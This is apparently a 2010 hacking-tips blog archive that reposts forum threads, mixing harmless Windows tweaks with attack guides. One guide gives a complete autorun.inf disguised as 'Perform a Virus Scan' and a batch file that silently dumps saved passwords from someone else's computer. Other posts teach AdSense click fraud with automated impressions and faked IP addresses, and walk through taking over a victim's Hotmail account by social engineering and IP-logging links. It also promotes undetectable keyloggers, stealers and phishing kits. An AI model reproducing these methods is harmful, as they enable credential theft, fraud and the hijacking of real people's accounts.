[meta content='0;url=http://www.mediapluss.com' http-equiv='refresh'/> 2010 ~ Hacking & Computer Tips

Getting IP Address of victim computer to hack/access computer remotely


The tutorial also mentions about obtaining IP Address of victim computer over msn.

Getting Ip Address:-

To see the ip all computers you are connected to (web servers, people attempting to hack into your computer).
Go to dos (start>run>type command) and run the netstat command. Type netstat /? for details.
Type netstat -r at the command prompt to see the ip of all computers you are connected to

In MSN (and other programs) when you are chatting to someone everything you type goes through the MSN servers first (they act as a proxy) so you see their ip rather than who you are chatting to. You can get round this by sending them a file as MSN doesn't send file through its proxy.


How to change the ICON of an EXE file?


Some times it becomes necessary to change the ICON of an executable(.exe) file so that the exe file get’s a new appearence.Many of the Tools such as TuneUP Winstyler does this job by adjusting the Windows to display a custom icon to the user.But in reality when the file is carried to a different computer, then it shows it’s original ICON itself.This means that inorder to permanantly change the ICON, it is necessary to modify the executable file and embed the ICON inside the file itself.Now when this is done the exe file’s ICON is changed permanantly so that even if you take file to a different computer it show’s a new icon. For this purpose I have found a nice tool which modifies the exe file and will embed the ICON of your choice into the file itself. ie:The tool changes the exe ICON permanantly.
I’ll give you a step-by-step instruction on how to use this tool to change the icon.
1. Goto www.shelllabs.com and download the trial version of Icon Changer and install it (Works on both XP and Vista).
2. Right-click on the exe file whose ICON is to be changed.
3. Now you will see the option Change Icon…Click on that option.
4. Now the Icon Changer program will open up.
5. Icon changer will search for all the ICONS on your system so that you can select any one of those.
6. Now select the ICON of your choice and click on SET.
7. Now a popup window will appear and ask you to select from either of these two options.
  • Change embeded icon.
  • Adjust Windows to display custom icon.
Select the first option (Change embeded icon).
8. You are done.The ICON get’s changed.


How to Rename the Recycle Bin


To change the name of the Recycle Bin desktop icon, open Regedit and go to:
HKEY_CLASSES_ROOT/CLSID/{645FF040-5081-101B-9F08-00AA002F954E}
and change the name "Recycle Bin" to whatever you want (don't type any quotes).


Can you change the Title of Yahoo Messenger?


Yes, of course simple follow the trick:

By default, this is “Yahoo! Messenger”, followed by your status. Simply edit the ymsgr.ini file, which you will find in the same folder as the Messenger program, in your Program Files folder. Locate the file and open it in Notepad. Then, at the end, add the following:
[APP TITLE]caption=YOUR TEXT
Here, “YOUR TEXT” is whatever you want in the title bar. Save the file and close Messenger. When you restart it you will see your text in the title bar.


How to remove Computer Virus Effect


Computer virus attacks on a computer system can sometimes have undesired side effects that make it harder for the computer user to remove the computer virus effectively. This includes disabling the Windows Task Manager, Windows Registry or the command line tool. These effects are sometimes still in place after cleaning the computer virus, trojan or malicious software program from the computer system.
Enter Re-Enable, a portable software program for the Windows operating system that can enable several disabled core functions of the Windows operating system. Re-enable can currently enable the following Windows functions if they have been disabled by a computer virus (or other program or effect).


  • Windows Registry
  • Command Line Tool
  • Windows Task Manager
  • System Restore Config
  • Folder Options
  • Run command
The program will display all support functions in its interface. All are checked by default and a click on the Enable button will enable these again. Nothing will happen if they are already enabled. Users who only want to enable a specific function can uncheck the other options in the interface easily.
computer virus
Windows Vista and Windows 7 users need admin rights to use the software program. The software program is also compatible with Windows XP. It can be downloaded from Softpedia.


Bypassing Megaupload


Get Firefox, and a download manager first.

1. At the address bar of Firefox, type in "about:config"
Just click the "ok" button there

2. Type in "general.useragent.extra.firefox" at the search box there.

3. Under "Firefox/3.5.2", double click on it, and change it so that it reads "Firefox/3.5.2 MEGAUPLAD 1.0"

4. This will trick the website into thinking that you have installed the megaupload toolbar, and you will be given priority for your downloads
(DO NOT DOWNLOAD IT IT IS HIGHLY SUSECPTABLE TO SPYWARE)

5. After filling in the captcha ( the box with the weird looking code in it), Wait for the countdown. When the "regular download" is available, right click on it and select your download manager from the list. (For me it would be "download by Orbit 'cos I use Orbit download Manager)

6. At first the download may not start, but just be patient and wait for 1~5mins, and the download will start!

7. If nothing happens after 10mins or so, just repeat step 5 again until it works.


Find Free Anonymous or unknown Web Proxies


A free anonymous web proxy site allows any web browser to access other third-party websites by channeling the browser’s connection through the proxy. The web proxy basically acts as a middleman between your web browser and the third-party website you are visiting. Why would you want to do this? There are two common reasons:

  • You’re connecting to a public network at a coffee shop or internet café and you want privacy while you browse the web. You don’t want the admin to know every site you visit.
  • You want to bypass a web content filter or perhaps a server-side ban on your IP address. Content filtering is common practice on college campus networks. This trick will usually bypass those restrictions.
There are subscription services and applications available such as TOR and paid VPN servers that do the same thing. However, this trick is free and easy to access from anywhere via Google. All you have to do is look through the search results returned by the queries below, find a proxy that works, and enter in the URL of the site you want to browse anonymously.


Get Hidden Secret Pages insted of Google search.


 Ever thought of Google work with Microsoft or MAC ? A game in Google Search Engine? A Google in Pirates Language? Well, many of us use the Google Search Engine for various purposes, but we are not aware of the fact that google has some hidden pages which serve the purpose of user accordingly. Suppose you are a great Hacker and you want things differently, then Google has a page for you. Amazed !!, here you go are some of the special pages by google.

Blackle (http://www.blackle.com)
elgooG (http://elgoog.rb-hosting.de/index.cgi)
Google (http://google.com)
Google BearShare (http://google.bearshare.com)
Google Bork, bork, bork! (http://www.google.com/intl/xx-bork)
Google BSD Linux (http://www.google.com/bsd)
Google Chuck Norris (http://nochucknorris.com)
Google Easter (http://www.google.com/Easter/feature_easter.html)
Google Elmer Fudd (http://www.google.com/intl/xx-elmer)
Google Hacker/Google Leetspeak (http://www.google.com/intl/xx-hacker) (HACKERS HOME)
Google Klingon (http://www.google.com/intl/xx-klingon)
Google Linux (http://www.google.com/linux)
Google Loco (http://www.thatsloco.com)
Google Mac (http://www.google.com/mac) (MAC HOME)
Google MentalPlex/Psychic Google (http://www.google.com/mentalplex)
Google Microsoft (http://www.google.com/microsoft) (MICROSOFT HOME)
Google Pig Latin (http://www.google.com/intl/xx-piglatin) (PIG LATIN)
Google Pirate (http://www.google.com/intl/xx-pirate) (PIRATES HOME)
Googoth/Google Gothic (http://www.googoth.co.in/)
Google Uncle Sam (http://www.google.com/unclesam) (US GOVERNMENT SEARCH)
 
Special searches
Look at Google calculator's computations!
1. Answer to life the universe and everything
(http://www.google.com/search?q=answer+to+life+the+universe+and+everything&sourceid=navclient-ff&ie=UTF-8&rlz=1B3GGGL_enIN176__243)
2. Number of horns on a unicorn
(http://www.google.com/search?q=number+of+horns+on+a+unicorn&sourceid=navclient-ff&ie=UTF-8&rlz=1B3GGGL_enIN176__243)
3.once in a blue moon
(http://www.google.com/search?q=once+in+a+blue+moon&sourceid=navclient-ff&ie=UTF-8&rlz=1B3GGGL_enIN176__243)
Finally A Game in Google
Type Google Easter eggs in the search box of google home page and press I am Feeling Lucky button. That it you find a game to pass time. :P

Hope you guys enjoy it.
 
You know more?? let's continue the list. Come, drop comment here to continue.


How to Hack A Flash Game!!


For any want-to-be Coder, hacking Flash Games is a good place to start.
Whether it be a Speedhack, or getting infinite life, it will probably be able to get you there.



1. Download Cheat Engine
Cheat Engine will allow you to find values and change them, which will be explained later
The current version is 5.5, so download that.

2. Find a flash game you want to hack.
For today, I'm going to hack a favorite of mine, Endless Zombie Rampage

3. Start the game.
Now, it's recommended to pause the game, for a bit.
Most Flash Games will have a pause button on the "P" key, so press that and the game will mostlikely pause.

4. Open up Cheat Engine.
If you want to follow their tutorial, go ahead.
If you just want to continue, find the Computer Icon at the Top Left Corner.
It will be flashing green and red repeatedly.

5. Select the Process.
Now, to select the thing you want to hack, you have to select the process.
That's just a fancy name for program.
Scroll down, and you'll probably find your browser.
For Internet Explorer, it'll be something like iexplorer.exe
For Firefox, it'll be something like firefox.exe
I currently do not know the process name for Google Chrome or Safari, but just remember that the process name is similar to the browser name.

6. Once you've done that, go back to the game, we'll start with an unlimited ammo hack.
Look at the amount of ammo you currently have.
For Endless Zombie Rampage, you will start with 10 Ammo.
For flash games, all the values (10 in this example) must be multiplied by 8.
If the Value is large (Like 35273) feel free to use a calculator, built into the computer.

7. Search for your value.
For us, it'll be "80"

8. Most likely, a BUNCH of values will pop up, and changing all of them is annoying, and dangerous.

9. Unpause the game, and fire one bullet.
That will change the value to "72"

10. Enter "72" as the value and press "Next Scan"
That will search for a value of 72, within the values you already got.

11. If you end up with less than 20 values, double click all of them.

12. That will bring it to the bottom section.
Now click on the value of each one, and set it to a value you want.
For example, I'll choose "7200" for each one, and the gun will have 900 Bullets.

13. Freezing
You might also notice the 'Freeze Value" button.
What that does is "freeze" the value, meaning it can't change until you unfreeze it.
That can be a good thing or a bad thing depending on your situation.
If I froze the values at 7200, the gun will have 900 Bullets, and will never turn to 899, or 901, even if I fired or reloaded.

14. Enjoy your hacks!
For other things like health, do the exact same things as I showed you.
Like, Record Health once, get hit, search for the next value.


Auto Webpage Clicket


Auto Webpage Clicker is a kind of software which can automatically click the web pages in batch. It can automatically click a batch of web pages you added with flexibility, and you can set the cycle number and the switching time of the clicker by yourself. It is easy, simple, no hassle with totally automatically operation and deflated in the system tray, even benefit for the people who know little computer

http://rapidshare.com/files/23980978...icker.v1.0.rar

http://hotfile.com/dl/4789157/724935....v1.0.rar.html

http://www.uploading.com/files/IHTXN....v1.0.rar.html


Changing the name of the Start Menu button



1. Run Resource Hacker, and open \windows\explorer.exe
2. Click String Table > 37 > 1033 (XP-style button)
3. Replace "start" with whatever you want ("hello", in the picture above)
4. Click the Compile Script button. Repeat steps 3 and 4 for String table > 38 > 1033 (Classic-style button)
5. Save the file (File>Save). Hit Cancel then Yes when Windows File Protection pops up.
Note: If an error message pops up when saving the file, kill explorer.exe (Clt-Alt-Del > Processes > explorer.exe > End Process > File > New Task), repeat step 5 (save the file in Resource Hacker), and restart explorer.exe (Clt-Alt-Del > Processes > explorer.exe > End Process > File > New Task > explorer > OK).


Changing the icon of the Start Menu button :

1. Click Bitmap > 143 > 1033
2. Click Action > Replace bitmap > Open file with new bitmap (the new picture must be 25x20, and have 16 million colors).
3. Select a picture file, click Replace, then save (File>Save) your work. Hit Cancel then Yes when Windows File Protection pops up.
4. Close Resource Hacker If you do not want to reboot to see your new button, kill then restart explorer.exe (Clt-Alt-Del > Processes > explorer.exe > End Process > File > New Task > explorer > OK)


Enjoy.....


Ghost Keylogger 3.80




Ghost Keylogger is an invisible easy-to-use surveillance tool that
records every keystroke to an encrypted log file. The log file can be
sent secretly with email to a specified receiver. Ghost Keylogger also
monitors the Internet activity by logging the addresses of visited
homepages. It monitors time and title of the active application; even
text in edit boxes and message boxes is captured.


Hack passwords using usb


How to hack passwords using USB Drive


Today I will show you how to hack Passwords using an USB Pen Drive.
As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc.
Along with these, Windows also stores passwords of Outlook Express, SMTP, POP,
FTP accounts and auto-complete passwords of many browsers like IE and Firefox.
There exists many tools for recovering these passswords from their stored places.
Using these tools and an USB pendrive you can create your own rootkit to hack
passwords from your friend?s/college Computer.

We need the following tools to create our rootkit:

MessenPass: Recovers the passwords of most popular Instant Messenger programs:
MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL
Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.
http://www.nirsoft.net/utils/mspass.html



Mail PassView: Recovers the passwords of the following email programs: Outlook
Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook
2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape
Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail,
Yahoo!, Gmail), if you use the associated programs of these accounts.
http://www.nirsoft.net/utils/mailpv.html



IE Passview: IE PassView is a small utility that reveals the passwords stored by
Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as
older versions of Internet explorer, v4.0 - v6.0
http://www.nirsoft.net/utils/interne..._password.html



Protected Storage PassView: Recovers all passwords stored inside the Protected
Storage, including the AutoComplete passwords of Internet Explorer, passwords of
Password-protected sites, MSN Explorer Passwords, and more?
http://www.nirsoft.net/utils/pspv.html



PasswordFox: PasswordFox is a small password recovery tool that allows you to view
the user names and passwords stored by Mozilla Firefox Web browser. By default,
PasswordFox displays the passwords stored in your current profile, but you can easily
select to watch the passwords of any other Firefox profile. For each password entry,
the following information is displayed: Record Index, Web Site, User Name,
Password, User Name Field, Password Field, and the Signons filename.
http://www.nirsoft.net/utils/passwordfox.html

------------------------------------------------------------------------------------------------

Here is a step by step procedre to create the password hacking toolkit:
NOTE: You must temporarily disable your antivirus before following these steps.
1. Download all the 5 tools, extract them and copy only the executables(.exe files)
into your USB Pendrive.
ie: Copy the files - mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe
into your USB Drive.
2. Create a new Notepad and write the following text into it:
Code:
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan

save the Notepad and rename it from
New Text Document.txt to autorun.inf
Now copy theautorun.inf file onto your USB pendrive.
3. Create another Notepad and write the following text onto it:
Code:
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt

save the Notepad and rename it from

New Text Document.txt to launch.bat
Copy the launch.bat file also to your USB drive.
Now your rootkit is ready and you are all set to hack the passwords. You can use this
pendrive on your friend?s PC or on your college computer. Just follow these steps
1. Insert the pendrive and the autorun window will pop-up. (This is because, we have
created an autorun pendrive).
2. In the pop-up window, select the first option (Perform a Virus Scan).
3. Now all the password hacking tools will silently get executed in the background
(This process takes hardly a few seconds). The passwords get stored in the .TXT
files.
4. Remove the pendrive and you?ll see the stored passwords in the .TXT files.
This hack works on Windows 2000, XP,Vista and 7
NOTE: This procedure will only recover the stored passwords (if any) on the
Computer.


140+ Fake Programs! (20MB)


I wanted to share this with you guys.

DOWNLOAD Share Cash
DOWNLOAD Mediafire

PASSWORD: Because of all the leechers you need to PM me and have a minimum of 50 posts.

Pack contains:
140+ Fake Programs!
It's only 19.2MB!

Screenshots:
----------------------------------------------------------------------------------------------

NVT Scan:
File Info

Report date: 2010-03-27 00:40:36 (GMT 1)
File name: Fake_Programs.rar
File size: 20134110 bytes
MD5 Hash: ffe960734b1ca4c71c6c425f378b3d20
SHA1 Hash: 16fbba15d54eb9085de998333b4078f2c5200984
Detection rate: 2 on 21 (10%)
Status: INFECTED

Detections

a-squared - Exploit.Win32.Nuker.VB!IK
Avast - -
AVG - -
Avira AntiVir - -
BitDefender - -
ClamAV - -
Comodo - -
Dr.Web - -
Ewido - -
F-PROT6 - -
G-Data - -
Ikarus T3 - Exploit.Win32.Nuker.VB
Kaspersky - -
McAfee - -
NOD32 - -
Panda - -
Solo - -
TrendMicro - -
VBA32 - -
VirusBuster - -
Zoner - -

Scan report generated by
NoVirusThanks.org

Link: http://scanner.novirusthanks.org/analysi...tcy5yYXI=/


Mbs of fake programs


Hey HackForums Here is a List of all the programs that I got from the forum and forums There are 138 Programs


[Image: fakeprograms.jpg]

The picture Does not show them all but They are all the post of the forums over time i was here


Here are some of the Programs



-----------------------------
[*]Cod_Mw2_Keygen-Idecrypt
[*]Camfrog Valid Key Generator
[*]Convert X to DVD
[*]Pro Show Gold Generator Keys
[*]Nexon_Card_Generator
[*]Panda Security 2010 Key Generator
[*]MSDN Admin
[*]Ninja Blade Key Generator
[*]Runescape_Stat_Changer
[*]PayPal_Account_Verifier
[*]Virtual DJ all Versions Keygen
[*]Wow Golden Eye
----------------------------------


(*Anti-N00b*)



[*]edit: Password: monster

File _67.7_mbs_Fake_Programs_137_Unpac received on 2010.04.18 06:02:21 (UTC)
Current status: Loading ... queued waiting scanning finished NOT FOUND STOPPED
Result: 0/40 (0%)
Loading server information...
Your file is queued in position: ___.
Estimated start time is between ___ and ___ .
Do not close the window until scan is complete.
The scanner that was processing your file is stopped at this moment, we are going to wait a few seconds to try to recover your result.
If you are waiting for more than five minutes you have to resend your file.
Your file is being scanned by VirusTotal in this moment,
results will be shown as they're generated.
Compact Compact
Print results Print results
Your file has expired or does not exists.
Service is stopped in this moments, your file is waiting to be scanned (position: ) for an undefined time.

You can wait for web response (automatic reload) or type your email in the form below and click "request" so the system sends you a notification when the scan is finished.
Email:

Antivirus Version Last Update Result
a-squared 4.5.0.50 2010.04.18 -
AhnLab-V3 5.0.0.2 2010.04.17 -
AntiVir 7.10.6.115 2010.04.16 -
Antiy-AVL 2.0.3.7 2010.04.16 -
Authentium 5.2.0.5 2010.04.16 -
Avast 4.8.1351.0 2010.04.17 -
Avast5 5.0.332.0 2010.04.17 -
AVG 9.0.0.787 2010.04.17 -
BitDefender 7.2 2010.04.18 -
CAT-QuickHeal 10.00 2010.04.17 -
ClamAV 0.96.0.3-git 2010.04.18 -
Comodo 4634 2010.04.18 -
DrWeb 5.0.2.03300 2010.04.18 -
eSafe 7.0.17.0 2010.04.15 -
eTrust-Vet 35.2.7431 2010.04.17 -
F-Prot 4.5.1.85 2010.04.17 -
F-Secure 9.0.15370.0 2010.04.16 -
Fortinet 4.0.14.0 2010.04.17 -
GData 19 2010.04.18 -
Ikarus T3.1.1.80.0 2010.04.18 -
Jiangmin 13.0.900 2010.04.18 -
Kaspersky 7.0.0.125 2010.04.18 -
McAfee 5.400.0.1158 2010.04.18 -
McAfee-GW-Edition 6.8.5 2010.04.18 -
Microsoft 1.5605 2010.04.18 -
NOD32 5037 2010.04.18 -
Norman 6.04.11 2010.04.16 -
nProtect 2010-04-17.01 2010.04.17 -
Panda 10.0.2.7 2010.04.17 -
PCTools 7.0.3.5 2010.04.18 -
Prevx 3.0 2010.04.18 -
Rising 22.43.06.01 2010.04.18 -
Sophos 4.52.0 2010.04.18 -
Sunbelt 6188 2010.04.17 -
Symantec 20091.2.0.41 2010.04.18 -
TheHacker 6.5.2.0.264 2010.04.18 -
TrendMicro 9.120.0.1004 2010.04.15 -
VBA32 3.12.12.4 2010.04.15 -
ViRobot 2010.4.17.2282 2010.04.17 -
VirusBuster 5.0.27.0 2010.04.17 -

Download From Here


AdSense Hacking Tutorial V4


AdSense is the best PPC(pay-per-click) programme in the world. Because it have a higher paying rate. So if you are using AdSense for a long time and cant make any money with it. You need help. In this tutorial, you will learn what is adsense, how adsense works and how you can cheat them.
How AdSense works, the basics
You put ads on your website, your visitor see those ads. and when they click on them you get money. if you are thinking that the whole thing is simple as that; then wake up, your in a dream.
Google place their ads, anyone can see them but google will start tracing them if they click on the ads. but the million dollar question is how they trace the clicker? here how they do it:
1. By Cookie.
2. By IP address.
3. By Referrer.
4. By User-agent.
5. Screen Resolution.
We will try to beat google in this tutorial. By hiding or faking those informations.
Now to the earing section. How google calculate earing. if you get your first visitor, your impression will be 1. Impression means now many times your ads are shown to the public. google will calculate the impressions and the clicks, and pay you that amount. But if your 1st visitor clicked on a ad, it will be suspicious. because google will do this calculation:
number of clicks (divided by) number of impression (%)
it will give a numerical result like 10% so google is calculating the ratio of the clicks and impressions. think that you have 13 impressions and 1 visitor clicked on a ad, so the calculation is
1 / 13% = 7.69230769
this number is called the CTR. but if you have 1 impression and 1 click your CTR will grow to 100. google will ban you if the CTR is higher then 10. [7-9 is safe]
Every ad has it own value. like an insurance ad, it is a 14$ ad. google will not pay that amount to you per click. if your CTR is 7, google will divide the amount with CTR. and you will get the result. like:
14/7=2$/per click
so getting the high paying ads are important. i will show you how to get it.
Getting Started
1: Get an adsense account from http://www.adsense.com
they will approve your account in 1-2 days.
2: create a new php or html page and paste there the adsense code.
3: download “high paying keywords” and paste it there.
http://www.mediafire.com/?j5nezdj2y22
4. you can add something cool to your website, like counter or “what my ip”
note: remember to keep it simple. don’t make it so heavy.
You will need
1. Autoit. Download: www.autoitscript.com/AutoIt/
2. FireFox Addons:
a) User-agent switcher Download: https://addons.mozilla.org/en-US/firefox/addon/59
b) RefControl Download:
https://addons.mozilla.org/en-US/firefox/addon/953
3. Hide my ip. Download: http://www.hide-my-ip.com/
4. Referrer list and user-agent list.

Download from


http://www.megaupload.com/?d=HDDN01UR
http://www.megaupload.com/?d=46UOQO46

NOTE: The main thing is creating the autoit script.
Getting the Impression
Steps:
1. Download autoit and install.
2. Right click on your desktop and go to: New>Autoit V3 script
3. Now goto start menu>autoitV3>AutoIt Window Info
4. On the “AutoIt Window Info”, goto “mouse” tab.
5. install “hide my ip”. then drag it to your start menu.
6. Hover your mouse to “start menu”, you will see “Position” in the “AutoIt Window Info” like “35,761″. write down that to a piece of paper.
7. Then hover your mouse to the “hide my ip” in start menu. write the position on paper.
8. Now in the “SciTE Script Editor”, write this:
MouseClick(“left”, 42, 754, 1)
replace the position 42 & 754 with your start menu position.
9. Again write this:
MouseClick(“left”, 42, 754, 1)
replace the position 42 & 754 with your “hide my ip” position in start menu.
8. Now click on the icon of “hide my ip”. hide my ip will come up. Then hover your mouse to the “change ip” button. get the position.
then write:
MouseClick(“left”, 42, 754, 1)
replace the position 42 & 754 with your “hide my ip”s “change ip” button position.
9. now write:
Sleep(3000)
the mouse will pause for 3 seconds. in this 3 second “hide my ip” will change the ip.
10. Open FireFox, Hover your mouse to “Tools”, then to the “clear private data”
[remember to tweak the setting on tools to not to ask before deleting and chose cookies and offline data to delete] get the positions of “tools” and “clear private data”
Write:
MouseClick(“left”, 42, 754, 1)
MouseClick(“left”, 42, 754, 1)
replace the 2 positions with proper positions.
11. then hover mouse to the reload button on FireFox
get the position and write on the script editor.
12. then write this
Sleep(10000)
13. copy the whole script and then paste 5 times. Then change 5 “Sleep(7000)” to “Sleep(8000)” “Sleep(9000)” “Sleep(10000)” “Sleep(12000)”
this will give you random interval between each impression.
14. Copy the whole script again and paste 999999 times.[just kidding. paste it many time]
15. Run the script for 1 hour, it will give you about 300 impressions.
Getting the Clicks
1. Get a random referrer from the referrer.txt and double click on RefControl on Firefox.
click on “edit” then click “Custom” paste the referrer on the field.
2. Goto Tools>User agent switcher>Options>options….>user agnets>import
import the agent.xml file
then you will see a large list of user agent, chose any one of those.
3. Change your ip.
4. goto your site
5. Click on a ad.
6. Do NOT close the site immediately. if its a insurace ad fill up the forms with junk info and submite.
7. clear cookies and repeat the steps.


Hacker Kit 2010


Hacker Kit 2010


[Image: qobxwm.jpg]


Some tools which hackers require in daily life. I personally use most of these.

Yahoo Account Locker
Acunetix Vulnerability Scanner + Crack
Admin Finder
Auto Surfer
Angry Ip Scanner
Anonymity Pack
Ardamax 28 and 2.9 + serial
Binders
Brutus
Crypters
Cookie Stealer
Debugging Tool
Email Bomber
Exploit Scanner
Ip Scanners
Irc Spammer
Md5 Cracker
Msn Freezer
MySqli Dumper
Passstealer - Istealer 5 and other fud stealers
Phishers - A to Z
Port Scanner
Shells Pack A to Z shells
Supernova 5
Telnet Tools
Xss scanner
zer0 server Attacker


Download From Here

Password:
The7thSage


Reverting A Hotmail Account



Before we get started, I know there are LOADS of these about, but

with the high volume of noobs visiting HackForums, the old tut's get

pushed down pages, leaving noobs with no choice but to post a thread

'How do i crack a hotmail'. ALSO, all the tut's I've seen have missed

loads of key points.


So without any further ado...


-------------------------------------------------------------------------------------------------------------------------------------------------------------

Firstly you'll need a victim. Once you have this victim, I would recommend opening a text document with the following sections.

[Image: notepadempty.png]

In this you'll see all the fields you'll need to fill for the revert form.
You will NOT need to fill out all of these in order to revert an account.
I'll note the importance of each field as we go along.


Email:

This field should be filled in already. If you're confused to what to put here, just leave. OJ, try reading from start again.


Full Name:

Ok this is where the S/E(social engineering) begins. If you have the victim on Facebook, or some other social networking site, where you can acquire their details, then fill out the fields you can, and skip along to where relevant.

If you Don't have a resource of their details, then visit this site:
PIPL

[Image: ppls.png]

On here you can search people by various different means. In this case, we're going to use the email, as this is the only information we have at this point. So go to the email tab, type it in and hit search. IF the person has signed up to websites with this email, you should get a list of sites they've signed up to, and if the site has a little padlock next to the thumbnail pic, it means the profile is locked (you will need to be friends to view).

IMPORTANT NOTICE ABOUT pipl.com: This site is slightly unreliable. If you search once and nothing comes up, you could search again and get 10 results. So best to search several times to make sure you haven't missed anything. ALSO this site doesn't search on FACEBOOK, so after you've been on this, try logging into facebook and searching on there for your victim, and hope their profile is open to view. If this isn't the case, make a fake profile (preferably of the opposite sex), add a nice profile picture, add them and hope for the best.

If you can't get any information on your victim using the above methods, there's a good chance they don't use the email for anything, rendering it a useless hack. In which case you should try and find out their main email.

You can also try http://www.yasni.co.uk/ which is supposed to be a decent people search, but you cannot search by email, so this is to be used as a secondary search.

So by this point we should have covered:
Email, Full name, Date Of Birth, Country, State/County, so next...


Postcode/ZIP:

For the postcode, all you need to do is use the information you already have to your advantage. You should know which country and town they are from. So with this information, go to Google and type in the town + the words 'full postcode'. So for example, let's say the victim lived in Manchester, England. You would type 'Manchester full postcode' into the google search bar. Now in the results you should find full postcodes for that district, which should be located next to the boldly highlighted words that you searched. Here's an example:

[Image: postcode.png]

And as the full postcode/zip isn't as necessary, it won't matter that it isn't exactly what your victims actual postcode is. The only problem with this method is success rate may vary with country and area. I have done this many times with English and American towns and rarely had a problem.


IP & ISP:

This is the hardest bit, yet still not very difficult.
To acquire a victims IP, you have a couple of options:

1. Get the victim to send you an email. This can be done by sending them something that would interest them, or just simply something that puzzles them, deeming them certain to reply to satisfy their curiosity. I would usually send an email asking ''Do you remember me from (blabla)'', using the information you gathered before, you should know their location and interests. Also don't forget to put a decent 'Subject', you want them to open it, not think it's just some junk/spam. Once they've replied, you now want to extract their IP address from the email. This is how it's done.

Go to your inbox, right-click the mail from the victim and click ''View message source'' Should look like this...

[Image: sourceemail.png]

After this you should see a white page with a load of jibberish that is of no relevance. But this is where the IP address of your victim lays.
What you're looking for is ''X-Originating IP:'' and after this will be the victims IP. It should look like this

[Image: 43574313.png]

If you have trouble finding the IP on this page, just hit ctrl+f for Finder and type IP. Should be maximum of 3-5, scroll through each one and I'm sure you'll find it.

2. Your second option is to get the person on MSN (unless you already have them), and get them to interact with you. You can use this tool to make it easier.

IPGet 1.5

This link is 100% safe, not uploaded by me, but is from another thread. Can scan if you like, but this isn't important anyway as there is another way around this. I won't explain how IPGet works as it is very basic but basically you need to get the victim to send or receive a file from you, or get them to send you a voice clip. IPGet will collect the IP. Here's a link for a IPGet tutorial:

IPGet Tutorial

Excuse the language, as I couldn't find a decent english one, but just follow the visual steps he takes in using IPGet.

DO NOT use any links advertised to download IPGet off of youtube, as I can't certify they're safe. I'd rather use the link I provided or try the other method coming up.

For the other option follow these instructions:
Start>Run>CMD(or command)
Then command prompt will pop-up. In command prompt, type ''netstat -n'' (without quotations). You should get a list like this...

[Image: netstat.png]

But filled in with a little more numbers. Print screen and paste into paint.
Then you'll need to do the same as before, get the person to send or receive a file from you, preferably something decently big, as you'll need a little time. Once the file is active (sending), start>run>cmd>netstat -n again and print screen the page again. Now paste this into a NEW paint, and compare the two results. On the 2nd page there should be a new number to the list, this is the victims IP, so take it down and add it to your txt document you're compiling.

Lastly, your final option, is to visit:
MyIPTest.
From here all you need to do is send the victim a link, and it will log their IP once they've visited it. I won't explain how to use, as the site is pretty self explanatory.
DON'T FORGET to TunyUrl your link otherwise it will be too obvious and no-one will click it.
Thanks to bobblejim for this.

Ok so now the IP is covered, how do we get the ISP(Internet Service Provider). Well it's as easy as this. Go to:

IP Tracer Website

This is an IP tracer website, which can get you loads of details on a persons connection and even location, providing you know the IP.
So the page will look like this:

[Image: iptrack.png]

Key:-
1. Is where we are going to enter the IP of the victim. Then hit the ''Track IP, host or website'' button.
2. Is where all the information on the victim will appear once the tracking is complete.

In the list of information (no.2) you should see a line for 'My ISP'. This is the Internet Service Provider the victim is running from the tracked IP.

So the only fields you should have empty now are 'Last sign in', 'Contacts', 'Mail' & 'Nickname', so let's keep it moving...


Last Sign-In:

All you'll need to do for this, is simply go onto their Facebook, or one of the sites you found out they were signed up to earlier, and see when they were last active. If the source is unreliable, just say ''Yesterday'' for this field, because if they are an active computer-user there's a good chance they were on.


Contacts:

To get the victims contacts for the ''Messenger contacts'' and ''Hotmail address book'' fields, all you need to do is go to their Facebook, or main social networking site, if they have one, and look at who they are most active with, i.e. who mostly leaves comments on their wall, likes their statuses etc. Good chance these are their closest friends, and therefore have them on MSN. You will need to collect the friends names AND emails if possible, although this isn't of extreme importance. Just so we're clear, MSN contacts and Hotmail address book contacts are the same, if you add someone to MSN, they will go to your address book.


Mail:

For the mail, you need to know some old mail they would have received in their hotmail inbox. All you need to do for this is visit http://www.pipl.com/ again (don't forget to search several times for more accurate results), and for all the results you get, that means they are signed up to the site, which in turn means they must have received registration emails from these websites. So take all these down and add them to your txt.


Nickname:

And finally we get to Nickname. Nice and simple, just add them on MSN, from another account, or if you have them already that's all good. Take down their screen/display name, and add it to your txt.

Ok so we should now have a complete form ready to revert this account.
Your txt. should look something like this.
[Image: lastform.png]
Fake details, so no trying anything noobs Nono

So here's a list of the fields and level of importance:

Email: Extreme Importance for obvious reasons...
Full name: Very important
D.O.B: Very important
Country: Important
County/State: Not very important
Postcode: Not very important
IP&ISP: Not important atall (though they will help your case alot)
Last sign-in: Not very important, but don't overstep your mark
Contacts: Important that you get them right
Mail: Important that you get them right
Nickname: Important that you get it right


IF YOU DON'T KNOW A FIELD, SIMPLY SAY 'I DON'T KNOW' or 'I CANNOT REMEMBER'

Some fields aren't as important as others, although if you attempt a guess and get it wrong, you'll pay severely by failing this whole revert.


REMEMBER: When filling out this form, it's going to an ACTUAL PERSON, not being auto-read by some bot, so at the bottom in the ''additional info'' box, make the most of it. Let them know you're desperate for your account back for whatever reason. All this will help.


Finally, the whole point of this tutorial, here is the revert link:
Revert Link
Bookmark it, as it's not very easy to memorise


DoctorLogger v4.0


DoctorLogger v4.0


I was going to post my 3.0 version here, but some noob posted it before I had the chance. So here is the 4.0 version of my keylogger.

[Image: 11kvxnm.png]

Features:
FUD
Antis
----
Anubis
BitDefender
Kaspersky
Keyscrambler
Malwarebytes
NOD32
Norman
Ollydbg
Outpost
Wireshark
AVG
Avast
VirtualPC
Comodo
----
Startup
Encrypt mail info
Downloader
Encrypt Dl link
USB Spread
